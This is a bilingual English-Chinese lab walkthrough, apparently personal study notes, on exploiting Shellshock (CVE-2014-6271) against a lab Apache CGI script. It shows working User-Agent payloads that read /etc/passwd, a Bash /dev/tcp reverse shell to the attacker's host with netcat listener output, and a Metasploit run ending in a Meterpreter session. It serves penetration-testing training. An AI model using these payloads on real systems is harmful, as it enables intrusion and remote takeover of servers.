Exploiting Bash CVE-2014-6271 Vulnerability (Shellshock)
CVE-2014-6271 - Shellshock
Shellshock (CVE-2014-6271) is the name given to a family of vulnerabilities in the Bash Shell (sin V1.3) that allow an attacker to execute remote arbitrary commands via Bash, consequently allowing the attacker to obtain remote access to the target system via a reverse shell.
The Shellshock vulnerability was discovered by Stephane Chazelas on the 12th of September 2014 and was made public on the 24th of September 2014.
Bash is a *Nix shell that is part of the GNU project and is the default shell for most Linux distributions.
The Shellshock vulnerability is caused by a vulnerability in Bash, whereby Bash mistakenly executes trailing commands after a series of characters: () {:;};.
This vulnerability only affects Linux as Windows does not use utilize Bash as it is not a *Nix based operating system.
In this context of remote exploitation, Apache web servers configured to run CGI scripts or .sh scripts are also vulnerable to this attack.
CGI (Common Gateway Interface) scripts are used by Apache to execute arbitrary commands on the Linux system, after which the output is displayed to the client.
Shellshock Exploitation
In order to exploit this vulnerability, you will need to locate an input vector or script that allows you to communicate with Bash.
In the context of an Apache web server, we can utilize any legitimate CGI scripts accessible on the web server.
Whenever a CGI script is executed, the web server will initiate a new process and run the CGI script with Bash.
This vulnerability can be exploited both manually and automatically with the use of an MSF exploit module.
利用 Bash CVE-2014-6271 漏洞 (Shellshock)
CVE-2014-6271 - Shellshock
Shellshock (CVE-2014-6271) 是 Bash Shell (sin V1.3) 中一系列漏洞的名称,这些漏洞允许攻击者通过 Bash 执行远程任意命令,从而允许攻击者获得对目标的远程访问系统通过反向外壳。
Shellshock 漏洞由 Stephane Chazelas 于 2014 年 9 月 12 日发现,并于 2014 年 9 月 24 日公开。
Bash 是一个 *Nix shell,它是 GNU 项目的一部分,并且是大多数 Linux 发行版的默认 shell。
Shellshock 漏洞是由 Bash 中的一个漏洞引起的,即 Bash 错误地执行了一系列字符之后的尾随命令:() {:;};。
There is a vulnerability within Bash in regards to the environment variable function decoleration. If these charcters are input into Bash, any other commands executed after these special characters will be execured by Bash.
此漏洞仅影响 Linux,因为 Windows 不使用 Bash,因为它不是基于 *Nix 的操作系统。
在这种远程利用的情况下,配置为运行 CGI 脚本或 .sh 脚本的 Apache Web 服务器也容易受到这种攻击。
Apache 使用 CGI(通用网关接口)脚本在 Linux 系统上执行任意命令,然后将输出显示给客户端。
If you are running an apache Web server, hosting web application, in regardless of wether it is a php or html. You can create or develop CGI script to obtain information from the system. If I want to get current time on Linux server, I can use CGI script to execute time command and redirect the output to the Web page.
If the attacker is able to execute the CGI script, In case of this vulnerability, Pass in these special set of characters as well as additional command you like to execute, you could potentially use this vulnerability to execute arbitray commands that could be malicious.
Shellshock 利用
为了利用此漏洞,您需要找到一个输入向量或脚本,以便您与 Bash 进行通信。
在 Apache Web 服务器的上下文中,我们可以利用 Web 服务器上可访问的任何合法 CGI 脚本。
Because they are interating with Bash or getting Bash to execute some commands, we can send request with this CGI script and get those special character input as well as any other commands that we would like to execute.
每当执行 CGI 脚本时,Web 服务器将启动一个新进程并使用 Bash 运行 CGI 脚本。
Whenever we make an HTTP request for that particular CGI script, the Web server will initiate new process and run the CGI script with Bash. So we can input these special chracters within one of the HTTP headers. The most effective techinique is to input those characters within the User-Agent HTTP header and then specify other commands we would like to execute after those characters.
可以使用 MSF 漏洞利用模块手动和自动利用此漏洞。
Demo: Exploiting Bash CVE-2014-6271 Vulnerability (Shellshock)(演示:利用 Bash CVE-2014-6271 漏洞 (Shellshock)
1
2
3
ifconfig
eth1: inet 192.24.241.2
1
nmap -sV 192.24.241.3
在浏览器中访问:
1
192.24.241.3
View Page Source
1
192.24.241.3/gettime.cgi
1
nmap -sV 192.24.241.3 --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi"
将Foxy Proxy切换为Burp Suite。在目录中选择03-Web Application Analysis->burpsuite。
Proxy->Intercept->Intercept is on->Forward->Reload->Send to Repeater
1
User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'
Gain a reverse shell on the target system. We can utilize Bash to connect to a listener on our Kali system.
1
nc -nvlp 1234
Connecting with Bash to our listener.
1
ifconfig
1
User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i>&/dev/tcp/192.24.241.2/1234 0>&1'
We should get a reverse shell on our listener.
1
daemon@victim-1:/opt/apache/htdocs$ whoami
Get the information regarding to the distribution.
1
daemon@victim-1:/opt/apache/htdocs$ cat /etc/*issue
Kernel information:
1
daemon@victim-1:/opt/apache/htdocs$ uname -a
That is how to exploit this vulnerability manually using Burp Proxy.
How to exploit this vulnerability with the Metasploit Framework.
1
2
3
4
5
6
7
8
9
10
service postgresql start && msfconsole
search shellshock
use exploit/multi/http/apache_mod_cgi_bash_env_exec
show options
set RHOSTS 192.24.241.3
set TARGETURI /gettime.cgi
exploit
meterpreter > sysinfo
Shellshock
概述
OWASP Top 10是一份意识文档,它概述了 Web 应用程序最关键的安全风险。渗透测试是根据 OWASP TOP 10 标准执行的,以减少/减轻安全风险。
在练习中,我们将重点关注OWASP A9 使用具有已知漏洞缺陷的组件,并对易受CVE-2014-6071攻击的 Web 服务器执行攻击。
目的:利用漏洞,在目标机器上执行任意命令。
指示:
这个实验室是献给你的!此网络上没有其他用户 :)
开始实验室后,您将可以访问 Kali GUI 实例。
你的 Kali 实例有一个 IP 地址为 192.XY2 的接口。运行“ip addr”以了解 X 和 Y 的值。
不要攻击位于 IP 地址 192.XY1 的网关
我自己的思路
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
root@attackdefense:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.1.0.6 netmask 255.255.0.0 broadcast 10.1.255.255
ether 02:42:0a:01:00:06 txqueuelen 0 (Ethernet)
RX packets 2427 bytes 237106 (231.5 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2044 bytes 2228288 (2.1 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.63.27.2 netmask 255.255.255.0 broadcast 192.63.27.255
ether 02:42:c0:3f:1b:02 txqueuelen 0 (Ethernet)
RX packets 17 bytes 1486 (1.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 10865 bytes 27489009 (26.2 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 10865 bytes 27489009 (26.2 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
1
2
3
4
5
6
7
8
9
10
11
root@attackdefense:~# nmap -sV 192.63.27.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-10-17 09:09 IST
Nmap scan report for target-1 (192.63.27.3)
Host is up (0.000010s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.6 ((Unix))
MAC Address: 02:42:C0:3F:1B:03 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.52 seconds
1
http://192.63.27.3/gettime.cgi
1
nmap -sV --script http-shellshock --script-args uri=/gettime.cgi 192.63.27.3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
root@attackdefense:~# nmap -sV --script http-shellshock --script-args uri=/gettime.cgi 192.63.27.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-10-17 09:22 IST
Nmap scan report for target-1 (192.63.27.3)
Host is up (0.000010s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.6 ((Unix))
|_http-server-header: Apache/2.4.6 (Unix)
| http-shellshock:
| VULNERABLE:
| HTTP Shellshock vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-6271
| This web application might be affected by the vulnerability known as Shellshock. It seems the server
| is executing commands injected via malicious HTTP headers.
|
| Disclosure date: 2014-09-24
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
| http://www.openwall.com/lists/oss-security/2014/09/24/10
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|_ http://seclists.org/oss-sec/2014/q3/685
MAC Address: 02:42:C0:3F:1B:03 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.53 seconds
1
2
3
4
5
6
7
8
9
GET /gettime.cgi HTTP/1.1
Host: 192.63.27.3
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
1
() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'
1
2
3
4
5
6
7
8
9
GET /gettime.cgi HTTP/1.1
Host: 192.63.27.3
User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
HTTP/1.1 200 OK
Date: Mon, 17 Oct 2022 03:58:07 GMT
Server: Apache/2.4.6 (Unix)
Connection: close
Content-Length: 957
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
1
2
3
4
5
6
7
8
GET /gettime.cgi HTTP/1.1
Host: 192.151.67.3
User-Agent: () { :; }; echo; echo; /bin/bash -c 'id'
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.151.67.3/
Connection: close
1
2
3
4
5
6
7
8
HTTP/1.1 200 OK
Date: Mon, 17 Oct 2022 09:40:49 GMT
Server: Apache/2.4.6 (Unix)
Connection: close
Content-Length: 46
uid=1(daemon) gid=1(daemon) groups=1(daemon)
1
2
3
4
5
6
7
8
GET /gettime.cgi HTTP/1.1
Host: 192.151.67.3
User-Agent: () { :; }; echo; echo; /bin/bash -c 'ps -ef'
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.151.67.3/
Connection: close
1
2
3
4
5
6
7
8
9
10
11
12
13
14
HTTP/1.1 200 OK
Date: Mon, 17 Oct 2022 09:43:17 GMT
Server: Apache/2.4.6 (Unix)
Connection: close
Content-Length: 555
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 09:27 ? 00:00:00 /usr/bin/python /usr/bin/supervisord -n
root 10 1 0 09:27 ? 00:00:00 /bin/bash /root/startup.sh
daemon 11 10 0 09:27 ? 00:00:00 /opt/apache/bin/httpd -X
daemon 12 11 0 09:27 ? 00:00:00 /opt/apache/bin/httpd -X
daemon 1034 12 0 09:43 ? 00:00:00 /usr/local/bash-4.3.0/bin/bash /opt/apache/htdocs/gettime.cgi
daemon 1035 1034 0 09:43 ? 00:00:00 ps -ef
1
2
3
4
5
root@attackdefense:~# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
断网了,所以重开了实验室。
1
2
3
4
root@attackdefense:~# ifconfig
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.181.17.2 netmask 255.255.255.0 broadcast 192.181.17.255
ether 02:42:c0:b5:11:02 txqueuelen 0 (Ethernet)
1
2
3
4
5
6
7
8
9
GET /gettime.cgi HTTP/1.1
Host: 192.181.17.3
User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i>&/dev/tcp/192.181.17.2/1234 0>&1'
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root@attackdefense:~# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.181.17.3.
Ncat: Connection from 192.181.17.3:42242.
bash: cannot set terminal process group (10): Inappropriate ioctl for device
bash: no job control in this shell
daemon@victim-1:/opt/apache/htdocs$ whoami
whoami
daemon
daemon@victim-1:/opt/apache/htdocs$ cat /etc/*issue
cat /etc/*issue
Ubuntu 14.04.6 LTS \n \l
daemon@victim-1:/opt/apache/htdocs$ uname -a
uname -a
Linux victim-1 5.4.0-125-generic #141-Ubuntu SMP Wed Aug 10 13:42:03 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
root@attackdefense:~# service postgresql start && msfconsole -q
Starting PostgreSQL 12 database server: main.
msf5 > search shellshock
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Yes Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner
1 auxiliary/server/dhclient_bash_env 2014-09-24 normal No DHCP Client Bash Environment Variable Code Injection (Shellshock)
2 exploit/linux/http/advantech_switch_bash_env_exec 2015-12-01 excellent Yes Advantech Switch Bash Environment Variable Code Injection (Shellshock)
3 exploit/linux/http/ipfire_bashbug_exec 2014-09-29 excellent Yes IPFire Bash Environment Variable Injection (Shellshock)
4 exploit/multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Yes Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
5 exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Yes Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
6 exploit/multi/http/cups_bash_env_exec 2014-09-24 excellent Yes CUPS Filter Bash Environment Variable Code Injection (Shellshock)
7 exploit/multi/misc/legend_bot_exec 2015-04-27 excellent Yes Legend Perl IRC Bot Remote Code Execution
8 exploit/multi/misc/xdh_x_exec 2015-12-04 excellent Yes Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
9 exploit/osx/local/vmware_bash_function_root 2014-09-24 normal Yes OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)
10 exploit/unix/dhcp/bash_environment 2014-09-24 excellent No Dhclient Bash Environment Variable Injection (Shellshock)
11 exploit/unix/smtp/qmail_bash_env_exec 2014-09-24 normal No Qmail SMTP Bash Environment Variable Injection (Shellshock)
msf5 > use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > show options
Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD_MAX_LENGTH 2048 yes CMD max line length
CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278)
HEADER User-Agent yes HTTP header to use
METHOD GET yes HTTP method to use
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPATH /bin yes Target PATH for binaries used by the CmdStager
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI yes Path to CGI script
TIMEOUT 5 yes HTTP read response timeout (seconds)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Linux x86
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set rhosts 192.181.17.3
rhosts => 192.181.17.3
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > set targeturi /gettime.cgi
targeturi => /gettime.cgi
msf5 exploit(multi/http/apache_mod_cgi_bash_env_exec) > exploit
[*] Started reverse TCP handler on 192.181.17.2:4444
[*] Command Stager progress - 100.46% done (1097/1092 bytes)
[*] Sending stage (985320 bytes) to 192.181.17.3
[*] Meterpreter session 1 opened (192.181.17.2:4444 -> 192.181.17.3:57322) at 2022-10-17 10:06:35 +0530
meterpreter > sysinfo
Computer : 192.181.17.3
OS : Ubuntu 14.04 (Linux 5.4.0-125-generic)
Architecture : x64
BuildTuple : i486-linux-musl
Meterpreter : x86/linux
meterpreter > getuid
Server username: uid=1, gid=1, euid=1, egid=1
meterpreter >
解决方案
此实验室的解决方案可在以下手册中找到:https://assets.ine.com/labs/ad-manuals/walkthrough-1911.pdf
